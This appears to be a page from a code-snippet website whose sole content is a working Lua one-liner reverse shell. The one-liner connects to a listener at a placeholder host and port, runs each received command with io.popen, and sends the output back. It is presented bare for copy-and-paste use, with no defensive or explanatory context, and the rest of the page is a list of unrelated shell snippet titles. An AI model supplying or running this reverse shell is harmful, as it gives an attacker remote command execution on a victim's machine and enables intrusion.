Search
 
SCRIPT & CODE EXAMPLE
 

SHELL

lua reverse shell

lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

Comment

PREVIOUS NEXT
Code Example
Shell :: xcode debug show full string 
Shell :: install qemu-img 
Shell :: docker remove none tag images 
Shell :: docker remove not running containers 
Shell :: pnpm auto-install-peers 
Shell :: express-generator ejs 
Shell :: clear ram cache linux 
Shell :: instal yay arch linux 
Shell :: sudo apt install openjdk-14-jdk 
Shell :: redis show all keys 
Shell :: Get total duration of video files in a directory 
Shell :: bash: /bin/rm: Argument list too long 
Shell :: kube delete cronjob 
Shell :: kill :80 port 
Shell :: how to install pycaw 
Shell :: pytorch anaconda install windows 
Shell :: ffprobe find video codec 
Shell :: vim save read only file 
Shell :: how to drive linux 2020 bluetooth on ubuntu 
Shell :: install discord in linux 
Shell :: linux install yarn 
Shell :: make git forget a file 
Shell :: how to clear docker-compose logs 
Shell :: ufw allow port range 
Shell :: Installing mongodb over ubuntu 22.04 
Shell :: git stash unstage cahnges 
Shell :: grep empty lines in a file 
Shell :: vim frozen 
Shell :: how to add new origin in git 
Shell :: update certbot domain nginx 
ADD CONTENT
Topic
Content
Source link
Name
4+7 =